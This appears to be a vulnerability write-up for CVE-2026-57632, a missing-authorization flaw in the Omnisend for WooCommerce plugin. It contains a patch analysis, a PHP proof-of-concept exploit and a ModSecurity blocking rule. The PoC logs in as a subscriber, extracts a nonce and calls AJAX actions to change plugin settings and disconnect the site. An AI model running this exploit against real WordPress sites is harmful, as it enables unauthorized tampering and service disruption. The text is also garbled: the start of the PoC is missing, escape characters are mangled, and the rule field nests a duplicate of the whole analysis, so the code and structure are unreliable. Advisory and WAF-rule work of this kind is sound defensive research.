CVE-2026-57632: Email Marketing for WooCommerce by Omnisend <= 1.19.0 Missing Authorization PoC, Patch Analysis & Rule

“`json
{
“analysis”: “Atomic Edge analysis of CVE-2026-57632: This is a missing authorization vulnerability in the Omnisend for WooCommerce plugin (versions up to 1.19.0). The vulnerability affects multiple AJAX handler functions and a script enqueuing function. It has a CVSS score of 4.3 (Medium).nnThe root cause is the absence of capability checks in three AJAX callbacks: `omnisend_update_plugin_setting`, `omnisend_disconnect_current_site`, and `omnisend_toggle_logging`. These functions are located in `/omnisend-connect/class-omnisend-ajax.php`. Each function only performed a nonce check (`check_ajax_referer`) but did not verify user capabilities. The nonce used (`omnisend-settings-script-nonce` or `omnisend_logs`) was accessible to any authenticated user, including subscribers. Additionally, the admin enqueue script function `omnisend_admin_scripts_and_styles` in `omnisend-woocommerce.php` lacked a capability check, allowing any authenticated user to trigger asset loading for the settings page.nnExploitation is straightforward. An authenticated attacker with subscriber-level access can send a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to one of the unprotected AJAX hooks. For example, calling `action=omnisend_update_plugin_setting` with `setting_name` and `setting_value` parameters allows unauthorized modification of plugin settings. The attacker must also include the nonce, which they can obtain by inspecting the plugin’s settings page or source code. The nonce is generated with a fixed action string like `omnisend-settings-script-nonce`, making it predictable across users with the same authenticated session.nnThe patch adds capability checks using `current_user_can(‘manage_options’)` before executing any sensitive action. The patched code now returns a 403 error with ‘Unauthorized’ message if the user lacks administrator privileges. The changes are minimal: three capability checks added in `class-omnisend-ajax.php` (lines 44-47, 89-92, 108-111) and one check in `omnisend-woocommerce.php` (lines 157-159).nnIf exploited, an attacker with subscriber-level access can modify any Omnisend plugin setting, disconnect the current site from Omnisend’s service, or toggle debug logging. This could disrupt email marketing operations, cause data loss by disconnecting the integration, or leak sensitive information through enabled debug logs. The plugin version is also changed from 1.19.0 to 1.19.1 in the patch.”,
“poc_php”: “// Atomic Edge CVE Research – Proof of Conceptn// CVE-2026-57632 – Missing Authorization in Omnisend for WooCommercenn $user,n ‘pwd’ => $pass,n ‘wp-submit’ => ‘Log In’,n ‘redirect_to’ => $url . ‘/wp-admin/’,n ‘testcookie’ => ‘1’n );n n curl_setopt_array($ch, array(n CURLOPT_URL => $login_url,n CURLOPT_POST => true,n CURLOPT_POSTFIELDS => http_build_query($login_data),n CURLOPT_RETURNTRANSFER => true,n CURLOPT_COOKIEFILE => ‘/tmp/cookies.txt’,n CURLOPT_COOKIEJAR => ‘/tmp/cookies.txt’,n CURLOPT_FOLLOWLOCATION => true,n CURLOPT_SSL_VERIFYPEER => false,n CURLOPT_USERAGENT => ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36’n ));n n $response = curl_exec($ch);n if (curl_getinfo($ch, CURLINFO_HTTP_CODE) != 200) {n die(“Login failed. HTTP Code: ” . curl_getinfo($ch, CURLINFO_HTTP_CODE));n }n curl_close($ch);n n // Get the settings page to extract noncen $ch = curl_init();n $settings_url = $url . ‘/wp-admin/admin.php?page=omnisend’;n curl_setopt_array($ch, array(n CURLOPT_URL => $settings_url,n CURLOPT_RETURNTRANSFER => true,n CURLOPT_COOKIEFILE => ‘/tmp/cookies.txt’,n CURLOPT_COOKIEJAR => ‘/tmp/cookies.txt’,n CURLOPT_FOLLOWLOCATION => false,n CURLOPT_SSL_VERIFYPEER => false,n CURLOPT_USERAGENT => ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36’n ));n n $response = curl_exec($ch);n preg_match(‘/wp_ajax_nonce.*?value=”([^”]+)”/’, $response, $matches);n $nonce = isset($matches[1]) ? $matches[1] : ”;n curl_close($ch);n n return $nonce;n}nn// Step 2: Exploit the missing authorization to update plugin settingsnfunction exploit_update_setting($url, $nonce) {n $ch = curl_init();n n $ajax_url = $url . ‘/wp-admin/admin-ajax.php’;n $post_data = array(n ‘action’ => ‘omnisend_update_plugin_setting’,n ‘_ajax_nonce’ => $nonce,n ‘setting_name’ => ‘omnisend_test_setting’,n ‘setting_value’ => ‘exploited_value’n );n n curl_setopt_array($ch, array(n CURLOPT_URL => $ajax_url,n CURLOPT_POST => true,n CURLOPT_POSTFIELDS => http_build_query($post_data),n CURLOPT_RETURNTRANSFER => true,n CURLOPT_COOKIEFILE => ‘/tmp/cookies.txt’,n CURLOPT_COOKIEJAR => ‘/tmp/cookies.txt’,n CURLOPT_SSL_VERIFYPEER => false,n CURLOPT_USERAGENT => ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36’n ));n n $response = curl_exec($ch);n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);n curl_close($ch);n n echo “[+] Attempted to update plugin setting\n”;n echo “[+] HTTP Response Code: $http_code\n”;n echo “[+] Response: $response\n”;n n return $response;n}nn// Step 3: Also try to disconnect the site (another vulnerable endpoint)nfunction exploit_disconnect_site($url, $nonce) {n $ch = curl_init();n n $ajax_url = $url . ‘/wp-admin/admin-ajax.php’;n $post_data = array(n ‘action’ => ‘omnisend_disconnect_current_site’,n ‘_ajax_nonce’ => $noncen );n n curl_setopt_array($ch, array(n CURLOPT_URL => $ajax_url,n CURLOPT_POST => true,n CURLOPT_POSTFIELDS => http_build_query($post_data),n CURLOPT_RETURNTRANSFER => true,n CURLOPT_COOKIEFILE => ‘/tmp/cookies.txt’,n CURLOPT_COOKIEJAR => ‘/tmp/cookies.txt’,n CURLOPT_SSL_VERIFYPEER => false,n CURLOPT_USERAGENT => ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36’n ));n n $response = curl_exec($ch);n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);n curl_close($ch);n n echo “[+] Attempted to disconnect Omnisend site\n”;n echo “[+] HTTP Response Code: $http_code\n”;n echo “[+] Response: $response\n”;n n return $response;n}nn// Main executionnecho “[+] CVE-2026-57632 Proof of Concept\n”;necho “[+] Target: $target_url\n”;necho “[+] Obtaining nonce…\n”;nn$nonce = login_and_get_nonce($target_url, $username, $password);nif (empty($nonce)) {n die(“[-] Failed to obtain nonce. Check credentials or URL.”);n}necho “[+] Nonce obtained: $nonce\n”;nnecho “[+] Exploiting vulnerability…\n”;nexploit_update_setting($target_url, $nonce);necho “\n”;nexploit_disconnect_site($target_url, $nonce);nnecho “[+] Exploitation complete.\n”;n?>n”,
“modsecurity_rule”: “{n “analysis”: “Atomic Edge analysis of CVE-2026-57632: This is a missing authorization vulnerability in the Omnisend for WooCommerce plugin (versions up to 1.19.0). The vulnerability affects multiple AJAX handler functions and a script enqueuing function. It has a CVSS score of 4.3 (Medium).\n\nThe root cause is the absence of capability checks in three AJAX callbacks: `omnisend_update_plugin_setting`, `omnisend_disconnect_current_site`, and `omnisend_toggle_logging`. These functions are located in `/omnisend-connect/class-omnisend-ajax.php`. Each function only performed a nonce check (`check_ajax_referer`) but did not verify user capabilities. The nonce used (`omnisend-settings-script-nonce` or `omnisend_logs`) was accessible to any authenticated user, including subscribers. Additionally, the admin enqueue script function `omnisend_admin_scripts_and_styles` in `omnisend-woocommerce.php` lacked a capability check, allowing any authenticated user to trigger asset loading for the settings page.\n\nExploitation is straightforward. An authenticated attacker with subscriber-level access can send a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to one of the unprotected AJAX hooks. For example, calling `action=omnisend_update_plugin_setting` with `setting_name` and `setting_value` parameters allows unauthorized modification of plugin settings. The attacker must also include the nonce, which they can obtain by inspecting the plugin’s settings page or source code. The nonce is generated with a fixed action string like `omnisend-settings-script-nonce`, making it predictable across users with the same authenticated session.\n\nThe patch adds capability checks using `current_user_can(‘manage_options’)` before executing any sensitive action. The patched code now returns a 403 error with ‘Unauthorized’ message if the user lacks administrator privileges. The changes are minimal: three capability checks added in `class-omnisend-ajax.php` (lines 44-47, 89-92, 108-111) and one check in `omnisend-woocommerce.php` (lines 157-159).\n\nIf exploited, an attacker with subscriber-level access can modify any Omnisend plugin setting, disconnect the current site from Omnisend’s service, or toggle debug logging. This could disrupt email marketing operations, cause data loss by disconnecting the integration, or leak sensitive information through enabled debug logs. The plugin version is also changed from 1.19.0 to 1.19.1 in the patch.”,n “poc_php”: null,n “modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-57632\n# Blocks unauthorized AJAX actions via Omnisend plugin\nSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:202657632,phase:2,deny,status:403,chain,msg:’CVE-2026-57632 Omnisend missing authorization AJAX’,severity:’CRITICAL’,tag:’CVE-2026-57632′”\n SecRule ARGS_POST:action “@rx ^omnisend_(update_plugin_setting|disconnect_current_site|toggle_logging)$” \n “chain”\n SecRule ARGS_POST:_ajax_nonce “@rx .+””n}”